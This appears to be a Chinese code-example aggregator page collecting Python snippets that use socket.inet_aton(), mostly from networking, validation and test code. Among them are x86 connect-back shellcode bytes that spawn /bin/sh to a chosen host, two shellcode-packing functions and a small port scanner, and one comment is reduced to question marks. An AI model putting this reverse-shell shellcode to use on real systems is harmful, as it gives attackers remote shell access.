我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用socket.inet_aton()。
def setup_sockets(self): self.sockets = {} ip_addresses = get_interface_addresses(self.logger) self.ip_addresses = ip_addresses multi_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) multi_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) multi_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, self.ttl) for ip in ip_addresses: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) mreq=socket.inet_aton(self.address)+socket.inet_aton(ip) multi_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) self.logger.info("Regestering multicast for: %s: %s"%(self.address, ip)) sock.bind((ip, self.port)) self.sockets[ip] = sock multi_sock.bind(("", self.port)) self.socks = [self.sockets[x] for x in self.sockets.keys()] self.multi_sock = multi_sock
def is_valid_cidr(string_network): """ Very simple check of the cidr format in no_proxy variable. :rtype: bool """ if string_network.count('/') == 1: try: mask = int(string_network.split('/')[1]) except ValueError: return False if mask < 1 or mask > 32: return False try: socket.inet_aton(string_network.split('/')[0]) except socket.error: return False else: return False return True
def addressInNetwork(self, ip, cidr): # the ip can be the emtpy string ('') in cases where the connection # is made via a web proxy. in these cases the sensor cannot report # the true remote IP as DNS resolution happens on the web proxy (and # not the endpoint) if '' == ip: return False try: net = cidr.split('/')[0] bits = cidr.split('/')[1] if int(ip) > 0: ipaddr = struct.unpack('<L', socket.inet_aton(ip))[0] else: ipaddr = struct.unpack('<L', socket.inet_aton(".".join(map(lambda n: str(int(ip)>>n & 0xFF), [24,16,8,0]))))[0] netaddr = struct.unpack('<L', socket.inet_aton(net))[0] netmask = ((1L << int(bits)) - 1) return ipaddr & netmask == netaddr & netmask except: return False
def consume(self, doc, _): """ Find entities in documents matching compiled regular expression. :param doc: Document object. :type doc: ``gransk.core.document.Document`` """ if not doc.text: return entities = doc.entities for result in self.pattern.finditer(doc.text): entity_value = result.group(result.lastgroup) if result.lastgroup == 'ip_addr': try: socket.inet_aton(entity_value) except socket.error: continue entities.add( result.start(result.lastgroup), result.lastgroup, entity_value)
def inet_pton(address_family, ip_string): if address_family == socket.AF_INET: return socket.inet_aton(ip_string) addr = sockaddr() addr.sa_family = address_family addr_size = ctypes.c_int(ctypes.sizeof(addr)) if WSAStringToAddressA( ip_string, address_family, None, ctypes.byref(addr), ctypes.byref(addr_size) ) != 0: raise socket.error(ctypes.FormatError()) if address_family == socket.AF_INET6: return ctypes.string_at(addr.ipv6_addr, 16) raise socket.error('unknown address family')
def is_valid_cidr(string_network): """Very simple check of the cidr format in no_proxy variable""" if string_network.count('/') == 1: try: mask = int(string_network.split('/')[1]) except ValueError: return False if mask < 1 or mask > 32: return False try: socket.inet_aton(string_network.split('/')[0]) except socket.error: return False else: return False return True
def __init__(self, server=DEFAULT_SERVER, port=DEFAULT_PORT, local_ip=None, debug=False, ip_forward=False): self.server = server self.port = port self.uid = b'test' self.ip = None self.debug = debug if ip_forward: self.ip = self.server else: if local_ip is not None: self.ip = local_ip else: # only available for dormitory subnet import IpFinder self.ip = IpFinder.get_ip_startswith('10.21.') or IpFinder.get_ip_startswith('10.20.') assert ip_forward or self.ip is not None, 'Can not find a correct local ip address. \ Please specify the IP address thought command-line argument using --ip' self.ip = socket.inet_aton(self.ip)
def to_raw(self, host, port): #pylint:disable=arguments-differ ''' :param ip: string representing the ip address or domain name to connect back to :param port: port to connect to on the remote host ''' l.debug("Connecting back to %s:%d", host, port) target_ip = socket.gethostbyname(host) raw_ip = socket.inet_aton(target_ip).encode('hex') if port < 0 or port >= 65535: raise ValueError("invalid port specified") raw_port = struct.pack("!H", port).encode('hex') return (self.hex_code % (raw_port, raw_ip)).decode('hex')
def to_raw(self, host, port): #pylint:disable=arguments-differ ''' :param ip: string representing the ip address or domain name to connect back to :param port: port to connect to on the remote host ''' l.debug("Connecting back to %s:%d", host, port) target_ip = socket.gethostbyname(host) raw_ip = socket.inet_aton(target_ip).encode('hex') if port < 0 or port >= 65535: raise ValueError("invalid port specified") raw_port = struct.pack("!H", port).encode('hex') return (self.hex_code % (raw_ip, raw_port)).decode('hex')
def ipv4(address): address = address.replace("http://", "").replace("https://", "") try: socket.inet_pton(socket.AF_INET, address) except AttributeError: try: socket.inet_aton(address) except socket.error: raise OptionValidationError("Option have to be valid IP address.") if address.count('.') == 3: return address else: raise OptionValidationError("Option have to be valid IP address.") except socket.error: raise OptionValidationError("Option have to be valid IP address.") return address
def is_ipv4(value): """Utility function to detect if a value is a valid IPv4 :param value: The value to match against. :return: True if the value is a valid IPv4. """ try: socket.inet_pton(socket.AF_INET, value) except AttributeError: # no inet_pton here, sorry try: socket.inet_aton(value) except socket.error: return False return value.count('.') == 3 except socket.error: # not a valid address return False return True
def is_valid_ipv4_address(address): try: socket.inet_pton(socket.AF_INET, address) except AttributeError: # no inet_pton here, sorry try: socket.inet_aton(address) except socket.error: return False return address.count('.') == 3 except socket.error: # not a valid address return False return True # ??????? ??? ??????????? ?????????? ???????????? ? OID. ??????????????? ???????? '%s' ?? ????????? ? ??????? ????? '0' (?????? ????????) # ????? ??????? ???????? ??? {?} ?? ??????? ? ?? ??????? ? ??????? # ??????, ??? ?????????? ?????????????? ??????? ? ??? ??? ??????? ??? ????, ?? ???? ??????? ????? ?????????? :)
def addUTMPEntry(self, loggedIn=1): if not utmp: return ipAddress = self.avatar.conn.transport.transport.getPeer().host packedIp ,= struct.unpack('L', socket.inet_aton(ipAddress)) ttyName = self.ptyTuple[2][5:] t = time.time() t1 = int(t) t2 = int((t-t1) * 1e6) entry = utmp.UtmpEntry() entry.ut_type = loggedIn and utmp.USER_PROCESS or utmp.DEAD_PROCESS entry.ut_pid = self.pty.pid entry.ut_line = ttyName entry.ut_id = ttyName[-4:] entry.ut_tv = (t1,t2) if loggedIn: entry.ut_user = self.avatar.username entry.ut_host = socket.gethostbyaddr(ipAddress)[0] entry.ut_addr_v6 = (packedIp, 0, 0, 0) a = utmp.UtmpRecord(utmp.UTMP_FILE) a.pututline(entry) a.endutent() b = utmp.UtmpRecord(utmp.WTMP_FILE) b.pututline(entry) b.endutent()
def test_simple(self): self.sock.dataReceived( struct.pack('!BBH', 4, 1, 34) + socket.inet_aton('1.2.3.4') + 'fooBAR' + '\0') sent = self.sock.transport.value() self.sock.transport.clear() self.assertEqual(sent, struct.pack('!BBH', 0, 90, 34) + socket.inet_aton('1.2.3.4')) self.assert_(not self.sock.transport.stringTCPTransport_closing) self.assert_(self.sock.driver_outgoing is not None) # pass some data through self.sock.dataReceived('hello, world') self.assertEqual(self.sock.driver_outgoing.transport.value(), 'hello, world') # the other way around self.sock.driver_outgoing.dataReceived('hi there') self.assertEqual(self.sock.transport.value(), 'hi there') self.sock.connectionLost('fake reason')
def test_eof_remote(self): self.sock.dataReceived( struct.pack('!BBH', 4, 1, 34) + socket.inet_aton('1.2.3.4') + 'fooBAR' + '\0') sent = self.sock.transport.value() self.sock.transport.clear() # pass some data through self.sock.dataReceived('hello, world') self.assertEqual(self.sock.driver_outgoing.transport.value(), 'hello, world') # now close it from the server side self.sock.driver_outgoing.transport.loseConnection() self.sock.driver_outgoing.connectionLost('fake reason')
def test_eof_local(self): self.sock.dataReceived( struct.pack('!BBH', 4, 1, 34) + socket.inet_aton('1.2.3.4') + 'fooBAR' + '\0') sent = self.sock.transport.value() self.sock.transport.clear() # pass some data through self.sock.dataReceived('hello, world') self.assertEqual(self.sock.driver_outgoing.transport.value(), 'hello, world') # now close it from the client side self.sock.connectionLost('fake reason')
def test_bad_source(self): self.sock.dataReceived( struct.pack('!BBH', 4, 2, 34) + socket.inet_aton('1.2.3.4') + 'fooBAR' + '\0') sent = self.sock.transport.value() self.sock.transport.clear() # connect from WRONG address incoming = self.sock.driver_listen.buildProtocol(('1.6.6.6', 666)) self.assertIdentical(incoming, None) # Now we should have the second reply packet and it should # be a failure. The connection should be closing. sent = self.sock.transport.value() self.sock.transport.clear() self.assertEqual(sent, struct.pack('!BBH', 0, 91, 0) + socket.inet_aton('0.0.0.0')) self.assert_(self.sock.transport.stringTCPTransport_closing)
def single_host(ip): try: socket.inet_aton(ip) except socket.error: return 'Error: Invalid IP address.' results = '' for p in PORTS: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c = s.connect_ex((ip, p)) socket.setdefaulttimeout(0.5) state = 'open' if not c else 'closed' results += '{:>5}/tcp {:>7}\n'.format(p, state) return results.rstrip()
def __init__(self, chnroutes, blacklists, using_rfc1918): self.china_subs = [] self.blackips = set() for sub in chnroutes: (l, h) = self.convert(sub) if l and h: self.china_subs.append((l, h)) for ip in blacklists: try: self.blackips.add(struct.unpack('>I', socket.inet_aton(ip))[0]) except socket.error: continue if using_rfc1918: self.china_subs.append(self.convert("192.168.0.0/16")) self.china_subs.append(self.convert("10.0.0.0/8")) self.china_subs.append(self.convert("172.16.0.0/12")) self.china_subs.sort()
def convert(self, net): parts = net.split('/') if len(parts) != 2: return (-1, -1) ip_s, mask_s = parts[0], parts[1] if ip_s and mask_s: try: ip = struct.unpack('>I', socket.inet_aton(ip_s))[0] except socket.error: return (-1, -1) mask = int(mask_s) if mask < 0 or mask > 32: return (-1, -1) hex_mask = 0xffffffff - (1 << (32 - mask)) + 1 lowest = ip & hex_mask highest = lowest + (1 << (32 - mask)) - 1 return (lowest, highest)
def is_in_china(self, str_ip): '''binary search''' try: ip = struct.unpack('>I', socket.inet_aton(str_ip))[0] except socket.error: return False i = 0 j = len(self.china_subs) - 1 while (i <= j): k = (i + j) // 2 if ip > self.china_subs[k][1]: i = k + 1 elif ip < self.china_subs[k][0]: j = k - 1 else: return True return False
def is_ip(address): """ Returns True if address is a valid IP address. """ try: # Test to see if already an IPv4 address socket.inet_aton(address) return True except socket.error: return False
def address(self, address): inet_aton(address) self.__address = address
def compile(self, state = None): bytes = ( "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" ) + inet_aton(self.address) + ( "\x66\x68" ) + pack("!H", self.port) + ( "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" ) if "\x00" in bytes: self.remove_encoding("nullfree") else: self.add_encoding("nullfree") return bytes
def localnet_register(host, port): ''' Runs a never-exiting thread which only registers a local network service via Zeroconf and then responds to info requests. ''' try: from zeroconf import ServiceInfo, Zeroconf from time import sleep except ImportError as e: logging.error( 'Zeroconf not installed, cannot register this server on the local ' 'network. Other players may still connect, but they must be told ' 'what your hostname and port are (hostname: {}, port: {})'.format( host, port)) return advertised_interface = local_address('127.0.0.1') info = ServiceInfo( "_defusedivision._tcp.local.", "{}{}._defusedivision._tcp.local.".format( host.replace('.', '-'), advertised_interface.replace('.', '-')), address=socket.inet_aton(advertised_interface), port=int(port), weight=0, priority=0, properties=b"") zc = Zeroconf() zc.register_service(info) atexit.register(lambda: zc.close()) while True: sleep(0.1)